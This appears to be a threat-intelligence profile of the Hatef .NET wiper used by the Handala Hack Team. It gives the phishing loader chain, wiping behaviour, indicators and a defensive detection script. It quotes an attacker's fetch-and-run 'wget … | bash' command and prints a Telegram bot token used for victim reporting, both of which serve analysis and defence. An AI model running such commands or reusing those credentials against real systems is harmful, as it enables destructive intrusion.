Hatef
Hatef is a Windows wiper malware family associated with the Handala Hack Team, a pro-Palestinian hacktivist-branded cluster that multiple security firms assess as linked to Iranian state activity, including reporting tying the broader cluster to MOIS and overlap with Void Manticore / Storm-0842 / BANISHED KITTEN / Dune. It is described as a .NET-based wiper for Windows and is repeatedly referenced alongside the Linux wiper Hamsa and other Handala-linked destructive malware including BiBi Wiper, Cl Wiper, CoolWipe, ChillWipe, and Handala Wiper.
High-confidence reporting ties Hatef to phishing-led destructive campaigns, including Operation HamsaUpdate, which targeted Israeli organizations with F5 BIG-IP vulnerability-themed lures. In that campaign, administrators were instructed to execute a ZIP-delivered Windows loader masquerading as an F5 update utility. The initial loader, a C# executable named F5UPDATER.EXE, extracted an embedded resource named Hatef.exe and executed it from System32. One documented loader sample had SHA-256 fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2. Another related loader sample, SHA-256 ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a, contained both Hatef.exe and Handala.exe resources, with Handala.exe acting as a Delphi second-stage loader.
Behaviorally, Hatef performs a singleton check, verifies Administrator privileges, and uses a fake updater message box to prompt the user for elevation. It recursively overwrites files with 4096-byte blocks of random data and then deletes them. Reported target paths include Users, Program Files, Program Files (x86), and Windows across connected drives. The malware reports execution status to a Telegram chat, including the victim's external IP address, hostname, a timestamp, and counts of files it failed to delete. The same reporting infrastructure was also used by the paired Linux Hamsa variant; published indicators include Telegram Bot ID 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA and chat/channel ID 6932028002.
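The overwrite-then-delete pattern and the Telegram status reporting described above are both observable in endpoint telemetry. The following detection heuristic is an added example written for this page, not code from any vendor report; it assumes a constructed flat event schema of (process, event_type, target) rather than a real product's field names, and the file-count threshold is a tuning assumption.

```python
from collections import defaultdict

# Target roots reported for Hatef, matched case-insensitively after any drive letter.
WIPER_ROOTS = ("\\users\\", "\\program files\\", "\\program files (x86)\\", "\\windows\\")
FILE_THRESHOLD = 5  # distinct files overwritten then deleted by one process (tuning assumption)
REPORTING_HOST = "api.telegram.org"  # Telegram Bot API host used for status reporting

def in_wiper_root(path):
    """True if the path sits under one of the reported target directories."""
    return any(root in path.lower() for root in WIPER_ROOTS)

def detect_wiper_behaviour(events, threshold=FILE_THRESHOLD):
    """Return sorted (process, finding, count) tuples.

    events: iterable of (process, event_type, target) with event_type in
    FileWrite / FileDelete / NetConnect (constructed schema, not a real product's).
    A file counts only if the same process wrote it BEFORE deleting it, which is
    the overwrite-then-delete pattern described for Hatef."""
    written = defaultdict(set)
    wiped = defaultdict(set)
    beacons = set()
    for proc, kind, target in events:
        key = target.lower()
        if kind == "FileWrite" and in_wiper_root(key):
            written[proc].add(key)
        elif kind == "FileDelete" and key in written[proc]:
            wiped[proc].add(key)
        elif kind == "NetConnect" and key.endswith(REPORTING_HOST):
            beacons.add(proc)
    findings = [(p, "overwrite_then_delete", len(f)) for p, f in wiped.items() if len(f) >= threshold]
    # A Bot API connection alone is low fidelity; it is reported so it can be correlated.
    findings += [(p, "telegram_bot_api", 1) for p in beacons]
    return sorted(findings)

# Constructed sample telemetry: one wiper-like process, one benign process.
WIPER = "C:\\Windows\\System32\\Hatef.exe"
OUTLOOK = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
SAMPLE_EVENTS = []
for i in range(6):
    doc = f"C:\\Users\\alice\\Documents\\report{i}.docx"
    SAMPLE_EVENTS += [(WIPER, "FileWrite", doc), (WIPER, "FileDelete", doc)]
SAMPLE_EVENTS += [
    (WIPER, "FileDelete", "C:\\Users\\alice\\never_written.txt"),  # delete without prior write: ignored
    (WIPER, "NetConnect", "api.telegram.org"),
    (OUTLOOK, "FileWrite", "C:\\Users\\alice\\AppData\\Local\\Temp\\tmp1.tmp"),
    (OUTLOOK, "FileDelete", "C:\\Users\\alice\\AppData\\Local\\Temp\\tmp1.tmp"),
]

if __name__ == "__main__":
    for finding in detect_wiper_behaviour(SAMPLE_EVENTS):
        print(finding)
```

The benign mail client writes and deletes a single temp file under Users and stays below the threshold; the threshold and root list are where real deployments will need tuning.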
Published reporting characterizes Hatef as part of a broader evolution in Iranian disruptive operations toward cross-platform destructive capability. Hatef is specifically identified as the Windows component of a Windows/Linux wiper set, while Hamsa and BiBi are described as Bash-based Linux wipers. Across reporting, Handala is said to deploy Hatef in attacks and to gain initial access through social engineering and phishing, including impersonation of legitimate organizations and use of major security incidents such as the CrowdStrike outage as lure material. Hatef has been publicly linked to campaigns targeting Israeli organizations and is also cited in reporting on Handala activity affecting Western targets, including the Stryker incident context, although some later disruptive operations were assessed as potentially relying on abuse of legitimate management tooling rather than traditional malware deployment.
Groups observed using it
1 distinct threat actor attributed by public researchers.
The group’s wiper malware family includes variants named BiBi Wiper, Hatef, Hamsa (Linux), CoolWipe, and ChillWipe.
Techniques & procedures
13 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Handala commonly gains initial access through phishing-based social engineering, combining lures built on major events and vulnerabilities with impersonation of legitimate organizations, and steals and leaks data through a dedicated leak site.
The most studied example is a phishing campaign from July 2024 that exploited the global CrowdStrike outage. The group sent emails to Israeli organizations offering fake remediation tools. Victims who downloaded the archive were hit with a multi-stage chain that ended in a wiper payload erasing their files.
Victims were directed to download a malicious archive containing a disguised installer that deployed a destructive wiper payload.
Execution
2 techniques
Handala campaigns typically use a staged execution chain designed to evade detection. Payload components are reconstructed at runtime and delivered through scripting frameworks before deploying the final wiper payload.
“the victim is instructed to run a specific file across all their Linux and Windows servers… utilize root privileges to execute a wget command… Windows server administrators are instructed to open and execute an attached archive ZIP file.”
Privilege Escalation
1 technique
“Hatef Wiper checks for Administrator privileges… presents a message box… requiring Administrator access to proceed… coax the user into granting elevated permissions.” / “For Linux servers… utilizing root privileges to execute a wget command.”
Stealth
1 technique
“F5UPDATER.EXE… disguised as a system update tool of F5.” / “After masquerading as a routine update… ‘The system has been updated successfully!’” / “Naples.pif… renamed AutoIt interpreter… .pif… camouflage…”
Discovery
1 technique
“transmits… external IP address… hostname… timestamp…” / “reconnaissance to identify the Linux distribution… Red Hat, Ubuntu, or Debian.”
Command and Control
2 techniques
“During its operation, the wiper sends periodic updates to a predetermined Telegram chat…” / “this wiper version transmits data to the same Telegram channel… Bot Id… Channel Id…”
“wget -O - https://…/update.sh | bash” / “Both ZIP files contain… F5UPDATER.EXE… extracts assembly from the resource section. The payload is written to System32 and executed.”
Impact
3 techniques
MITRE ATT&CK TTPs
Tactic: Impact | ID: T1485 | Technique: Data Destruction
Handala combines information gathering and system disruption to paralyze healthcare, education, and infrastructure with the BiBi/Hatef wipers.
Tactic: Impact | ID: T1561.002 | Technique: Disk Structure Wipe
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
A wiper malware variant in Handala’s toolkit used for destructive impact operations.
A .NET-based Windows wiper used in cross-platform destructive campaigns and focused on file-level destruction.
A wiper malware reportedly used by Handala in destructive attacks to wipe Windows and Linux systems.
A .NET-based destructive wiper in Handala's malware arsenal.